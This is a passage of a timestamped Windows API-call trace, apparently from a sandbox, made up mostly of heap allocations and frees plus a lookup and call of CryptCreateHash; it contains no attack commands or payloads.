[0235.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0235.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0235.772] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0235.772] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0235.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0235.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0235.772] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0235.772] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0235.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0235.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0235.772] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0235.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0235.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0235.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0235.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0235.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0235.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0235.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51430, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0235.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0235.773] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0235.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0235.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0235.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0235.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0235.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0235.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0235.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0235.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0235.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0235.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0235.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0235.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0235.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0235.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0235.774] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0235.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0235.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0235.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0235.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0235.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0235.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0235.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0235.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0235.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0235.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0235.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0235.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0235.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0235.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0235.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0235.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0235.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0235.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0235.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0235.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0235.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0235.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0235.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0235.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0235.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0235.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0235.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0235.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0235.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0235.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0235.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0235.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0235.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0235.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0235.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0235.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0235.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0235.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0235.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0235.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0235.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0235.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0235.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0235.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0235.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0235.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0235.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0235.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0235.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0235.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0235.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0235.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0235.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0235.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0235.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0235.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0235.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0235.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0235.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0235.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0235.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0235.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0235.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0235.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0235.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0235.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0235.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0235.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0235.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0235.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0235.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0235.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0235.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0235.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0235.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0235.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0235.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0235.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0235.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0235.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0235.777] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0235.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0235.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0235.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0235.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0235.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0235.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0235.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0235.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0235.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0235.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0235.782] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0235.782] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0235.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0235.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0235.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0235.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0235.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0235.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0235.782] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0235.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0235.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0235.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0235.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0235.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0235.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0235.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0235.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0235.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0235.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0235.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0235.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550f8 [0235.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0235.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0235.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0235.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0235.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55098, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0235.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0235.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0235.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0235.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0235.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0235.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0235.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0235.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0235.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0235.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0235.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0235.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0235.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0235.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0235.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0235.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0235.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0235.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0235.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0235.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0235.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0235.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0235.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0235.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0235.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0235.784] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0235.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0235.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0235.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0235.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0235.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0235.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0235.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0235.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0235.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0235.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0235.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0235.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0235.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0235.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0235.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0235.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0235.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55058 [0235.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0235.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0235.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0235.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0235.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0235.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0235.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0235.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0235.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0235.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0235.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0235.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0235.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0235.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0235.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0235.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0235.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0235.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0235.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0235.786] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0235.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0235.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0235.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0235.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0235.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0235.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0235.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0235.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0235.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0235.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0235.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0235.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0235.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0235.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0235.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550c8 [0235.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0235.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0235.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 